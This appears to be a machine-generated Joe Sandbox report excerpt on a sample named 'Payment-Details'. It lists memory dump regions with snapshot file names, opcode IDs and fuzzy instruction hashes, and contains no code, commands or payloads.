                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bde67eafec444aa2606189cfd8ac8409b20666286478e859216d961d2e48d655
                                        • Instruction ID: fd9bb73c63bb421e0da220429fd43c175c4e31f39c928b93a60d2ad57559b5c7
                                        • Opcode Fuzzy Hash: bde67eafec444aa2606189cfd8ac8409b20666286478e859216d961d2e48d655
                                        • Instruction Fuzzy Hash: 7EF03774A00214CFCB50CF28DA96BA973F4EB4C300F2041A5D90A9B356DB355E908F81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 847992d15a4800a2178dda7a3828860615afef8b9e962a45c4abfd0f40b4f107
                                        • Instruction ID: 1585094a6cc7d73203145aa3c82c79f1ceda41e30996769be9645524d7fc5207
                                        • Opcode Fuzzy Hash: 847992d15a4800a2178dda7a3828860615afef8b9e962a45c4abfd0f40b4f107
                                        • Instruction Fuzzy Hash: 60F019B0A51214CFDB10CB28E996BEAB7F1FB4C700F1051A9D90A9B355DB359E458F81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ab37e259ead8a77e86ed9d482b3b0c8a5fae64ca71108d475d11e85ad30c9fa
                                        • Instruction ID: 52e51d5c569302f9b7742bf18a32fce5e73ce941165d597fd61718fecba5bea0
                                        • Opcode Fuzzy Hash: 2ab37e259ead8a77e86ed9d482b3b0c8a5fae64ca71108d475d11e85ad30c9fa
                                        • Instruction Fuzzy Hash: 2AF092B4D29388AFC741DFB8D88529CBFB4EF06200F2000E6C984D3252E7304E95C751
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a486fd2523522bb9cc76f474a4172c657bab988f772e5356fcf5ac1c3f3508f6
                                        • Instruction ID: 651110675ac35f431e7626aba31f5f5aff617ba385b394675ee12500ad628636
                                        • Opcode Fuzzy Hash: a486fd2523522bb9cc76f474a4172c657bab988f772e5356fcf5ac1c3f3508f6
                                        • Instruction Fuzzy Hash: 17F0657491D3449FC751DBB49845698BFF8DB05108F1041EAD945D2351D7705985C7A2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 18c92065da4ae6c7871d1cffb6455adf69997ff1dae5dccdfb6460e456a738f0
                                        • Instruction ID: bc137ed5b33ad18a713d5f8ead21eaf8bbae02ad787301cc43471bc552d7fcdd
                                        • Opcode Fuzzy Hash: 18c92065da4ae6c7871d1cffb6455adf69997ff1dae5dccdfb6460e456a738f0
                                        • Instruction Fuzzy Hash: ACE0DF7000E244FFC722CFA4C8516A9BBBCEF03304B24868FD88443262DA328E52D352
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1fb396c26c222fc1383ba8c3030050f6f747ecbd7bb173e29281c27c84ffc69f
                                        • Instruction ID: db221cb99af2539d61c39e9e0caa00916ce6eb4f838a9944bbd5ae671afad376
                                        • Opcode Fuzzy Hash: 1fb396c26c222fc1383ba8c3030050f6f747ecbd7bb173e29281c27c84ffc69f
                                        • Instruction Fuzzy Hash: 2EF0E574C04208BFCB50CF94D801AADBFB4EB49310F10C0EAED5463351D6339A51DB82
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: afb5d93676bba30992a888e91813053141bb57b742dae3f12067b383506a26f1
                                        • Instruction ID: caee95253f9d31b32297c1daf0bc968b507a9a66b7031790b8a070b0598aef36
                                        • Opcode Fuzzy Hash: afb5d93676bba30992a888e91813053141bb57b742dae3f12067b383506a26f1
                                        • Instruction Fuzzy Hash: A4E09BF480D344AFC745CBA4DC50A69BF74EB47300F2480EEE84557351D6355E41DB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 559797c60054f804d5ba37fa04fec4c245e2e86c801200a950a4c8fbf0682722
                                        • Instruction ID: 5aa489dd3c455d5f585f5808df18f470038d7d7f273fab7c943517cd608c2d55
                                        • Opcode Fuzzy Hash: 559797c60054f804d5ba37fa04fec4c245e2e86c801200a950a4c8fbf0682722
                                        • Instruction Fuzzy Hash: FDF0A0B0C09248AFCB04DBA9D9515A8BFB4DB46204F1080EEDC5457351DA355A81CF91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0ad19df4aac9d98979b4e5e8e1c35980702e39393ee1a4ebdf2e0cbb7552ba48
                                        • Instruction ID: df57334ee1a448423d859e9d53540cd0d2da8f2d36aa35ff1979fe8b1525da75
                                        • Opcode Fuzzy Hash: 0ad19df4aac9d98979b4e5e8e1c35980702e39393ee1a4ebdf2e0cbb7552ba48
                                        • Instruction Fuzzy Hash: 7FE086B2F142146BD714A69A6810BAEB7DBCBC4720F00C06AD919DB380DDB55D0147A9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 31b417c2f81b80fecd305a8fad361dfc59ceff0deed43cf6d0eb7c013e526ef5
                                        • Instruction ID: d90490202a9314e61108364c486ecd0f8ce7fcd96662050d747d95b56eb95509
                                        • Opcode Fuzzy Hash: 31b417c2f81b80fecd305a8fad361dfc59ceff0deed43cf6d0eb7c013e526ef5
                                        • Instruction Fuzzy Hash: 53E065706053859FCB01DF7094546EDBFB9DB8A200B0582DAD844DB245D6351E04D761
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d90a0fd7e7be12a6abe2c2b94ede51e4daf68ffd94bb56c45dab3e98b4dbcca2
                                        • Instruction ID: 258d314810183961c6a557bd6a64865c5199132ea6123233f92e853f5bdfde31
                                        • Opcode Fuzzy Hash: d90a0fd7e7be12a6abe2c2b94ede51e4daf68ffd94bb56c45dab3e98b4dbcca2
                                        • Instruction Fuzzy Hash: C0F0A0B0D19349EFCB11EFB8980429CBFB5EB06300F1082EAD858A3261D7385A45CF51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 01b343990ab38133d614ff055bbdaaf30656306499092bee64e6f2d4bc6723a8
                                        • Instruction ID: c920fa4176117d01a00b97964b079664f8acd8329a47bc1168a43503b8be5a9a
                                        • Opcode Fuzzy Hash: 01b343990ab38133d614ff055bbdaaf30656306499092bee64e6f2d4bc6723a8
                                        • Instruction Fuzzy Hash: 0CE06D75509349EFCB41CF64E8112D9BFB9EB46200F1442DAE84897746D6352E04DBA2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7c04b6649c43bba9a82cc6a9f1afd1fe5b7d1a20dddc658b43684a416eb17d22
                                        • Instruction ID: a4cd4ed34db2b81a903cc52f883613ee58d110dccb8c72b6b11874f41a9d4737
                                        • Opcode Fuzzy Hash: 7c04b6649c43bba9a82cc6a9f1afd1fe5b7d1a20dddc658b43684a416eb17d22
                                        • Instruction Fuzzy Hash: 00F06DB4E04208FFCB80EFA8D4497ADBBF9EB05200F1081A9D858A3351D634AE40CF51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7c8c8126543fc370e3af9fb2f962fcd3520313dd44ccc6fdf142c94b655ce240
                                        • Instruction ID: 19fe849e308fc51c2d82ea9d91cd777504b321c905b8c7ab89bd6cb6f70b510f
                                        • Opcode Fuzzy Hash: 7c8c8126543fc370e3af9fb2f962fcd3520313dd44ccc6fdf142c94b655ce240
                                        • Instruction Fuzzy Hash: F6E01A317003165BD7109A2AE884C4BFB9EFED06657108A3AA51A87226DAB4AD0687A0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 69615854a7e04d3b45968a26465faef1cb53ab748a48c90713a2cf75ed55c406
                                        • Instruction ID: 92ae450f38de29790461c78e921c3fec46164dfb9511b1247dcd80c8d4182da7
                                        • Opcode Fuzzy Hash: 69615854a7e04d3b45968a26465faef1cb53ab748a48c90713a2cf75ed55c406
                                        • Instruction Fuzzy Hash: 72E0D874D09208BFD710DF94EC42AA9BF78EB45300F54C19AD90427391DA315E92C7D2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b46da572c055e39a99d1d37959ac4a3f01e693177c1dfd395aac498f5eaea0a6
                                        • Instruction ID: 9483de3f161837a6ee1c963640e6986d1eb8ed23499a0fb283da744fa430d422
                                        • Opcode Fuzzy Hash: b46da572c055e39a99d1d37959ac4a3f01e693177c1dfd395aac498f5eaea0a6
                                        • Instruction Fuzzy Hash: 34F0E774900568CFDB60CF14C998BA8B7F5FB48315F5085D9C509A7352C3399E86CF40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2d66c4aa8d1dce8ada5b6eabcf0a34009400510f2ebb5e7478dc5e449575c4fc
                                        • Instruction ID: 2d8b72eb9b2c46d4d576a8f4b2c5ab692d9a50a2a9f4b250d2985576401c393c
                                        • Opcode Fuzzy Hash: 2d66c4aa8d1dce8ada5b6eabcf0a34009400510f2ebb5e7478dc5e449575c4fc
                                        • Instruction Fuzzy Hash: 80F030B4904248EFCB50CF98D850AADBBF8EB49310F14C19AED58A3351C6359A51EB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c3e523404ed7d2bc0db88c7ad18e0938b43b5a0260f06b2c7953450ac649b71d
                                        • Instruction ID: 8d6daf41cc5f6ce10938c2897d23ac12b84213e7ced5efece7495efcec40cbf1
                                        • Opcode Fuzzy Hash: c3e523404ed7d2bc0db88c7ad18e0938b43b5a0260f06b2c7953450ac649b71d
                                        • Instruction Fuzzy Hash: 3CE092B0D29359DFC751DFA8D85429DBFF8EF06200F6041DAD888E3262E7304A84C751
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c79e7bba4f9ffb0bc60fae8bd70591c077de21398688b1b2a96b059fc1eeed98
                                        • Instruction ID: 2c6a0c65c68b44d2e29cce74d5ef694bdfec2dcdeaaeebe68db52147683eda22
                                        • Opcode Fuzzy Hash: c79e7bba4f9ffb0bc60fae8bd70591c077de21398688b1b2a96b059fc1eeed98
                                        • Instruction Fuzzy Hash: 8FF0C9B0D65219CFEB24CF66C8447A8BBF6FB8A311F549069A809F7311DB709981CF10
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c7e0f8725b7433202871e3da8bbbd2886ffe49c4a0a4ab621e8c938bbb10b976
                                        • Instruction ID: ae38fec38ce4f8ed4b521efff43cc376cfe857e98b7aa6bfb37c9f8c078f1e30
                                        • Opcode Fuzzy Hash: c7e0f8725b7433202871e3da8bbbd2886ffe49c4a0a4ab621e8c938bbb10b976
                                        • Instruction Fuzzy Hash: 88F01535A04208EFCB41CF98D840AADBBB6EB48310F10C099ED1863360C7329A62EB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6ba0d698aaf8e23d1eb6d558013bddfb35c16cb817e2086094d7069ae7a0b5d3
                                        • Instruction ID: df1bd6da86f4970e316697824080f6062a3e82c718b814e6e15a1ec4db096642
                                        • Opcode Fuzzy Hash: 6ba0d698aaf8e23d1eb6d558013bddfb35c16cb817e2086094d7069ae7a0b5d3
                                        • Instruction Fuzzy Hash: FBE0DFB4D09308FBC750CFA8ED55AADBB74EB86300F608199E84433391CA326DA2C7D5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9beb28e05aa9c4bbfb5e695d1b81d3f2e68fb037b49b7b0b2106387cbf2311b4
                                        • Instruction ID: 782150cfc06d3062436569c9af3db04e19b9a46443b9af403eafb7a4ea16021b
                                        • Opcode Fuzzy Hash: 9beb28e05aa9c4bbfb5e695d1b81d3f2e68fb037b49b7b0b2106387cbf2311b4
                                        • Instruction Fuzzy Hash: 02F0F8B0D0020ADFDB50EFA88509A6EBFF9BB08215F148469DB09E7645E3308541CB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fc24a68ad9be5ac1950f4d56b17c6fb670d563c6cdc192c7b4eaa1a8b922857c
                                        • Instruction ID: 35d88a388b2deea32509678acfe8830469945dcaf63352ca87636a08516f2bd9
                                        • Opcode Fuzzy Hash: fc24a68ad9be5ac1950f4d56b17c6fb670d563c6cdc192c7b4eaa1a8b922857c
                                        • Instruction Fuzzy Hash: 2FF0A930909388DFCB00DBA4E4046BDBFB9FB88300F2086EAD808D3351E6360E05CB92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d898087504712b9a3dc5cac142496acf4d5ecd952582ff9908b1df2c55ca46dc
                                        • Instruction ID: 946a0d0b4cd7b7bb0b1fad37ac593a8b0b52166d4993b6ae57acbb650431b67f
                                        • Opcode Fuzzy Hash: d898087504712b9a3dc5cac142496acf4d5ecd952582ff9908b1df2c55ca46dc
                                        • Instruction Fuzzy Hash: 06F065B0929385DFCB96DF78C4482997FB0DF47215F5405EED44497691D2301A45D701
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 99ad5566f4a82db7eead08912a5035ba6f85cfc95b227a1091dbd048f92417da
                                        • Instruction ID: 8cd50cd8b4521bbecfecf6e3ccd87b7689938c0f8ee50124b8d1c8016fedbf48
                                        • Opcode Fuzzy Hash: 99ad5566f4a82db7eead08912a5035ba6f85cfc95b227a1091dbd048f92417da
                                        • Instruction Fuzzy Hash: 44F0B2B4D01288CFDB50CF99D4457ACBBFAFB09300F51816AE559AB358D7749986CF02
                                        Memory Dump Source
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c0ad0c0e7dee31908323817a9e05026dcf2e0857099de0e6d82677e438244030
                                        • Instruction ID: f5268db7771cc0a6fd33b70e081acb4bd522af1ac75a9d0f301f61865fa2d9c8
                                        • Opcode Fuzzy Hash: c0ad0c0e7dee31908323817a9e05026dcf2e0857099de0e6d82677e438244030
                                        • Instruction Fuzzy Hash: 34E017F294120CEFDB90EBF4890479E77E9DF59200F5146A9D549A3120EA354A80A7A6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a039ab93ea78ef113dc2d66ad87d3788eeb4d58ca7fe8b2dac1f865864ada3d4
                                        • Instruction ID: c00f38acfa43ba7162ec0d323bf8be330c1e8f349fff04939a113d5d4198924a
                                        • Opcode Fuzzy Hash: a039ab93ea78ef113dc2d66ad87d3788eeb4d58ca7fe8b2dac1f865864ada3d4
                                        • Instruction Fuzzy Hash: 3EE08C74908208EBCB44DF94D84166CBBB8EB45300F609199C80823350CB315E42CBC0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a039ab93ea78ef113dc2d66ad87d3788eeb4d58ca7fe8b2dac1f865864ada3d4
                                        • Instruction ID: 6fb577c1ed6e9bd7754937be10da6114dc7ab9020d57c171576310703c2ea895
                                        • Opcode Fuzzy Hash: a039ab93ea78ef113dc2d66ad87d3788eeb4d58ca7fe8b2dac1f865864ada3d4
                                        • Instruction Fuzzy Hash: 97E0C274D08308EFCB44DFA4D8406ACBBB4EB45300F208198C80823350C6326E82CBC4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693466177.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7510000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8ce239d43f3c976336f58773f943401f355f7b78d74e7501cd190b9afd082a49
                                        • Instruction ID: 17d64e4e8002984415f85a28b53aeeaf26b1e8f22f4a94888cff1222e74cc68a
                                        • Opcode Fuzzy Hash: 8ce239d43f3c976336f58773f943401f355f7b78d74e7501cd190b9afd082a49
                                        • Instruction Fuzzy Hash: 42E0ECB4D15258EFCB80DFA8D84979DBBB4EB06205F5051E9D908A3350E7305A81DB51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693466177.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7510000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c2e505ebed69e3f8e97e4651ddf1d716f8140546028d4e8e41c8ea346a6f1a7d
                                        • Instruction ID: a147e981cbc77891be39012ae466da5429249e9228173e94403d63352e6b3280
                                        • Opcode Fuzzy Hash: c2e505ebed69e3f8e97e4651ddf1d716f8140546028d4e8e41c8ea346a6f1a7d
                                        • Instruction Fuzzy Hash: E7E0C2B4908208EBCB04EF94D840AACBBB8FB46310F24819DC80823391CB316E43DB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c84e1be94c84c141e2154ddec317161ceb0b9c5c7e7ba81eab2fb5beb9edb97f
                                        • Instruction ID: e94adf476b9db40f967a9f68dd813f72a6e0fdb2ad0f140552f94ae1807cb374
                                        • Opcode Fuzzy Hash: c84e1be94c84c141e2154ddec317161ceb0b9c5c7e7ba81eab2fb5beb9edb97f
                                        • Instruction Fuzzy Hash: BEE05B3225C30D9FD752EF95D4509413BF8BF257343058067E648CB032E325C965DB61
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e005aa7785f232497a404dd6ae012074563069052301210216cfc07c9ecc8a0f
                                        • Instruction ID: 3b399964371416071839d7d61e60ac098216c2dda845a257c0e5995e88c3a3be
                                        • Opcode Fuzzy Hash: e005aa7785f232497a404dd6ae012074563069052301210216cfc07c9ecc8a0f
                                        • Instruction Fuzzy Hash: 98E04F34900208EFCB00DFA4E54456DBBBDFB88311B2086A4EC0893304EB315E04DB82
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 829e6d2841f4f04bc7781c1f936d71ceaee7e8409bad508515c593596327b408
                                        • Instruction ID: e6bbe27dfbb0704411625f888b8ffc02570ffc22bfa194ce8e9819278213efaf
                                        • Opcode Fuzzy Hash: 829e6d2841f4f04bc7781c1f936d71ceaee7e8409bad508515c593596327b408
                                        • Instruction Fuzzy Hash: C0E012B181130CEFD710EFF4D90475E7BBDDB4A201F1046A9D609A3160FE314A809BD2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aaa965b5d22ed8e9b6d3f3a5ae364585f279ab363f55c61bb1695e9735a591bc
                                        • Instruction ID: f04e278655d113515b08176b3b4ae8dfc452d935cb63ef386913c4c20f1f43a1
                                        • Opcode Fuzzy Hash: aaa965b5d22ed8e9b6d3f3a5ae364585f279ab363f55c61bb1695e9735a591bc
                                        • Instruction Fuzzy Hash: 86E0C2F4919208EBCB04DF94D84066CFBB8EB46300F20C1ADE84823350CA329E82CB80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9b80a0a9682d6e1354c3dd66cf18f2515cdc092fda113b0bc2676e39f0f3e2d
                                        • Instruction ID: 8ab95cce148cc5aeafad85a570dd3c43e99ddd04820688bee84c1dd2957f70f1
                                        • Opcode Fuzzy Hash: f9b80a0a9682d6e1354c3dd66cf18f2515cdc092fda113b0bc2676e39f0f3e2d
                                        • Instruction Fuzzy Hash: 85E08CF0C24308EFCB80EFB8848439CBBB9EB06205F6040A8C848A3250E6745AC0CB40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 95dbfdaacdddb928bb1d277c0572a05ea8fb0ce0da6f70d290faf790c7213a20
                                        • Instruction ID: b9b32385d461b10b1fbbd1999106981b675122e707fa78fc81b5e00e426f06d3
                                        • Opcode Fuzzy Hash: 95dbfdaacdddb928bb1d277c0572a05ea8fb0ce0da6f70d290faf790c7213a20
                                        • Instruction Fuzzy Hash: B6D05BB0D69308DBC714DFA4D94466D7B79EB46301F504198D80533650D7701D81D755
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9f9da61f32abc826aab56c11d569f09390cb61b37889eb126db0ed0fb154249f
                                        • Instruction ID: 69cb62ddbb9f9d78bd12711a77246fe9fc4fee1b18d99efd15473b978db8d1f1
                                        • Opcode Fuzzy Hash: 9f9da61f32abc826aab56c11d569f09390cb61b37889eb126db0ed0fb154249f
                                        • Instruction Fuzzy Hash: 11E0C270A00208EFDF00DFB4D80076DB7BEEB85204F018599D808DB300EA712E009B90
